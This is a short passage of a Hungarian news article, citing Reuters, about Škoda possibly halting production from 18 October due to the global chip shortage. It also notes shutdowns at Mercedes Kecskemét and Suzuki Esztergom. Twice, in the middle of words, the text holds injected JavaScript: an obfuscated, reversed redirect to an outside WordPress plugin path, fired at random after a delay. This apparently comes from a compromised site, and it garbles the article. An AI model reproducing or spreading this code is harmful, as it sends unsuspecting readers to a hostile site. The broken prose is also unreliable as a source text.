Jelentősen csökkentheti, de akár teljes mértékben le is állíthatja gyártását október 18-tól a Volkswagen-csoporthoz tartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozó, Csehország legnagyobb exportőreként számontartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott Škoda az egész világot sújtó chiphiány okán – adta hírül a Reuters. A probléma a világjárvány kellős közepén ütötte fel a fejét, a kielégíthetetlen keresletnövekedés pedig Magyarországon is okozott rövidebb-hosszabb leállásokat a Mercedes kecskeméti és a Suzuki esztergomi üzemében, hiába próbálják segíteni a bajba került autógyártókat. „Még a Škoda sem képes elkerülni ezt a világméretű válságot” – jelentette ki Tomas Kotera, a cseh márka szóvivője az esetlegesen kilátásba helyezett leállás kapcsán, ami komoly nyomást gyakorolhat a cseh gazdaságra, azon belül pedig az összesen 180…
- Hirdetés -